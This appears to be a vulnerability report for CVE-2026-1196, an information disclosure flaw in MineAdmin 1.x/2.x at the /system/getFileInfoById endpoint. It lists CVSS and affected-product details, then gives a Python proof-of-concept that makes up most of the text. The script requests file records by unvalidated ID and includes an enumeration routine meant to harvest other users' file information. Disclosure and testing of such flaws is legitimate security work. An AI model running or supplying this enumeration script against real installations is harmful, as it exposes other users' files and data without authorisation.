Security Vulnerability Report
CVE-2026-1196 CVSS 3.1 LOW

Published: 2026-01-20 01:15:56
Last Modified: 2026-04-29 01:00:02

Description

A security vulnerability has been detected in MineAdmin 1.x/2.x. It affects an unknown function of the file /system/getFileInfoById. Manipulating the argument ID leads to information disclosure. The attack can be launched remotely. It requires a high level of complexity, and exploitation is reported to be difficult. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score: 3.1
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:mineadmin:mineadmin:1.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:mineadmin:mineadmin:2.0:*:*:*:*:*:*:* - VULNERABLE
MineAdmin 1.x, all versions
MineAdmin 2.x, all versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-1196 PoC - MineAdmin Information Disclosure
# Target: MineAdmin 1.x/2.x
# Endpoint: /system/getFileInfoById
import requests
import json

TARGET_URL = "http://target-website.com"  # Replace with actual target
API_ENDPOINT = "/system/getFileInfoById"


def exploit_cve_2026_1196(target_url, file_id):
    """
    Exploit for CVE-2026-1196
    Information Disclosure vulnerability in MineAdmin /system/getFileInfoById endpoint

    Args:
        target_url: Base URL of the vulnerable MineAdmin instance
        file_id: Integer ID of the file to retrieve info (can be enumerated)

    Returns:
        dict: Response containing file information if vulnerable
    """
    # Construct the vulnerable endpoint
    url = f"{target_url}{API_ENDPOINT}"

    # Prepare request parameters
    params = {
        "id": file_id  # Unvalidated ID parameter
    }

    # Headers (may require basic authentication)
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
    }

    try:
        # Send GET request to vulnerable endpoint
        response = requests.get(url, params=params, headers=headers, timeout=10)

        if response.status_code == 200:
            data = response.json()

            # Check if sensitive information is leaked
            if "data" in data or "file_path" in data or "path" in data:
                print(f"[!] Vulnerability confirmed! File ID: {file_id}")
                print(f"[+] Leaked information: {json.dumps(data, indent=2)}")
                return data
            else:
                print(f"[*] No sensitive data for File ID: {file_id}")
                return None
        else:
            print(f"[*] Request failed with status: {response.status_code}")
            return None

    except requests.exceptions.RequestException as e:
        print(f"[!] Request error: {e}")
        return None


def enumerate_files(start_id=1, end_id=1000):
    """
    Enumerate file IDs to discover other users' files
    """
    leaked_files = []

    print(f"[*] Starting enumeration from ID {start_id} to {end_id}")

    for file_id in range(start_id, end_id + 1):
        result = exploit_cve_2026_1196(TARGET_URL, file_id)
        if result:
            leaked_files.append({"id": file_id, "data": result})

    print(f"\n[+] Total leaked files: {len(leaked_files)}")
    return leaked_files


if __name__ == "__main__":
    # Single file test
    print("[*] Testing single file ID...")
    exploit_cve_2026_1196(TARGET_URL, 1)

    # Or run enumeration
    # enumerate_files(1, 100)
